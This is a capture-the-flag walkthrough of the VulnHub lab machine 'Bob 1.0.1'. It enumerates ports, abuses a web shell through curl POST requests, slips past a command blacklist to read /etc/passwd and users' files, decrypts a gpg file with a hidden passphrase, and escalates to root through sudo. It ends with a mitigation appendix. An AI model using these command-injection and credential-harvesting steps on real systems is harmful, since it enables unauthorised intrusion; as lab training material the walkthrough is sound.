Bob: 1.0.1 ~ Vulnhub - Walkthrough

Objective

Acquire root access and get hold of the flag in /

Source: [VulnHub.com]

Status: [Completed]

Methodology

Define our target

root@kali:# export TANGO=192.168.56.101

Discovery

root@kali:# nmap -O -p- -sT -sV -T5 -o nmap.txt $TANGO

PORT      STATE SERVICE VERSION
21/tcp    open  ftp     ProFTPD 1.3.5b
80/tcp    open  http    Apache httpd 2.4.25 ((Debian))
25468/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u2 (protocol 2.0)
MAC Address: 08:00:27:C0:CC:74 (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Entry Point #1 - Port 80 (HTTP)

Enumeration

root@blaksec:~# nikto -h $TANGO
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.101
+ Target Hostname:    192.168.56.101
+ Target Port:        80
+ Start Time:         2018-05-24 18:19:38 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.25 (Debian)
+ Server leaks inodes via ETags, header found with file /, fields: 0x591 0x5669af30ee8f1 
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/dev_shell.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/lat_memo.html' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/passwords.html' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.html: Admin login page/section found.
+ 7539 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time:           2018-05-24 18:19:49 (GMT-4) (11 seconds)
---------------------------------------------------------------------------

Let's take a closer look at that robots.txt

root@kali:~# curl http://$TANGO/robots.txt
User-agent: *
Disallow: /login.php
Disallow: /dev_shell.php
Disallow: /lat_memo.html
Disallow: /passwords.html

dev_shell.php sounds very promising. Dive dive dive!

Exploitation

After good 30 mins of poking it appeared there is some sort of blaklist - commands like ls, pwd, cat, nc are being blocked. Nothing we can't work around though - all we had to do is to replace ls with find, echo, dir, and cat with strings (see Exploiting web shells - working your way around blacklisted commands for more sweet workarounds).

Let's see what we have!

root@blaksec:~# curl -s -d "in_command=strings /etc/passwd" -X POST http://$TANGO/dev_shell.php
...
c0rruptedb1t:x:1000:1000:c0rruptedb1t,,,:/home/c0rruptedb1t:/bin/bash
bob:x:1001:1001:Bob,,,,Not the smartest person:/home/bob:/bin/bash
jc:x:1002:1002:James C,,,:/home/jc:/bin/bash
seb:x:1003:1003:Sebastian W,,,:/home/seb:/bin/bash
elliot:x:1004:1004:Elliot A,,,:/home/elliot:/bin/bash
sshd:x:116:65534::/run/sshd:/usr/sbin/nologin
proftpd:x:117:65534::/run/proftpd:/bin/false
ftp:x:118:65534::/srv/ftp:/bin/false
...

Looks like a few regular users on this host. Check them out

curl -s -d "in_command=find /home" -X POST http://$TANGO/dev_shell.php -o files_home.txt

Bunch of goodies turned up! For the most notable ones:

/home/seb/proftpd-1.3.3c
/home/bob/.old_passwordfile.html
/home/bob/Documents/Secret
/home/bob/Documents/Secret/Keep_Out
/home/bob/Documents/Secret/Keep_Out/Not_Porn
/home/bob/Documents/Secret/Keep_Out/Not_Porn/No_Lookie_In_Here
/home/bob/Documents/Secret/Keep_Out/Not_Porn/No_Lookie_In_Here/notes.sh
/home/bob/Documents/Secret/Keep_Out/Porn
/home/bob/Documents/Secret/Keep_Out/Porn/no_porn_4_u
/home/bob/Documents/staff.txt
/home/bob/Documents/login.txt.gpg
/home/bob/Downloads/Wheel_Of_Fortune.py
/home/bob/Downloads/Hello_Again.py
/home/elliot/theadminisdumb.txt

Quick look through the files... few quite interesting entries! The last one was fun to read - elliot b*ches and moans about admin bragging about his new password.. wait.. yei! we have a password!

root@blaksec:~# curl -s -d "in_command=strings /home/elliot/theadminisdumb.txt" -X POST http://$TANGO/dev_shell.php
...
theadminisdumb
...

Aaaaaand we're in!!!

# ssh elliot@$TANGO -p 25468
  __  __ _ _ _                        _____                          
 |  \/  (_) | |                      / ____|                         
 | \  / |_| | |__  _   _ _ __ __ _  | (___   ___ _ ____   _____ _ __ 
 | |\/| | | | '_ \| | | | '__/ _` |  \___ \ / _ \ '__\ \ / / _ \ '__|
 | |  | | | | |_) | |_| | | | (_| |  ____) |  __/ |   \ V /  __/ |   
 |_|  |_|_|_|_.__/ \__,_|_|  \__, | |_____/ \___|_|    \_/ \___|_|   
                              __/ |                                  
                             |___/                                   


elliot@192.168.56.101's password: 
Linux Milburg-High 4.9.0-4-amd64 #1 SMP Debian 4.9.65-3+deb9u1 (2017-12-23) x86_64

elliot@Milburg-High:~$

Poking around /home(s)... seb does not seem to have anything interesting and neither does jc. bob, however, is worth exploring!

elliot@Milburg-High:/home/bob$ cat .old_passwordfile.html 
hey n there .old_passwordfile.html
elliot@Milburg-High:/home/bob$ alias
alias cat='echo hey \n there'

*** rolling my eyes ***

elliot@Milburg-High:/home/bob$ strings .old_passwordfile.html 
<html>
jc:Qwerty
seb:T1tanium_Pa$$word_Hack3rs_Fear_M3
</p>
</html>

su'd to each of these users just to see if any interesting sudo roles but nothing fun there so back to bob!

elliot@Milburg-High:/home/bob/Documents$ file login.txt.gpg
file login.txt.gpg
login.txt.gpg: GPG symmetrically encrypted data (AES cipher)

Spent good hour poking around trying to find the right pass and then found this file. Well actually I found it earlier and opened it prob 5-6 times.. and then stared at it.. and then squinted.. and it's only when I executed that notes.sh script it hit me!

elliot@Milburg-High:/home/bob$ ./Documents/Secret/Keep_Out/Not_Porn/No_Lookie_In_Here/notes.sh 
-= Notes =-
Harry Potter is my faviorite
Are you the real me?
Right, I'm ordering pizza this is going nowhere
People just don't get me
Ohhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh <sea santy here>
Cucumber
Rest now your eyes are sleepy
Are you gonna stop reading this yet?
Time to fix the server
Everyone is annoying
Sticky notes gotta buy em

'HARPOCRATES'

Let's test if it the right pass

elliot@Milburg-High:/home/bob/Documents$ gpg --batch --passphrase HARPOCRATES -d login.txt.gpg
<g --batch --passphrase HARPOCRATES -d login.txt.gpg
gpg: keybox '/home/seb/.gnupg/pubring.kbx' created
gpg: AES encrypted data
gpg: encrypted with 1 passphrase
bob:b0bcat_

From here it's pretty much a wrap up

elliot@Milburg-High:/home/bob$ su bob
Password: 
bob@Milburg-High:~$ sudo -l
[sudo] password for bob: 
Matching Defaults entries for bob on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User bob may run the following commands on localhost:
    (ALL : ALL) ALL

bob@Milburg-High:~$ sudo su -

root@Milburg-High:/# strings flag.txt 
CONGRATS ON GAINING ROOT
        .-.
       (   )
        |~|       _.--._
        |~|~:'--~'      |
        | | :   #root   |
        | | :     _.--._|
        |~|~`'--~'
        | |
        | |
        | |
        | |
        | |
        | |
        | |
        | |
        | |
   _____|_|_________ Thanks for playing ~c0rruptedb1t
root@Milburg-High:/#

Final Notes

Sometimes it is Ok to follow your gut feel and deviate from your own style (e.g. trying spawn a reverse shell) - fun things can be lying in plain view.

Appendix A: Vulnerability Detail and Mitigation

Insufficiently Protected User Credentials
Rating High
Description Copies of user passwords were found stored in clear-text files
Impact Taking over an account would allow perpetrator to access all privileges and functions granted to that account, including but not limited to access accessing restricted data and processes, running restricted programs, elevated access through sudo roles.
Remediation Put policies in place educating users about dangers of storing credentials in unprotected files. Establish a process to perform periodic system scans to detect such data.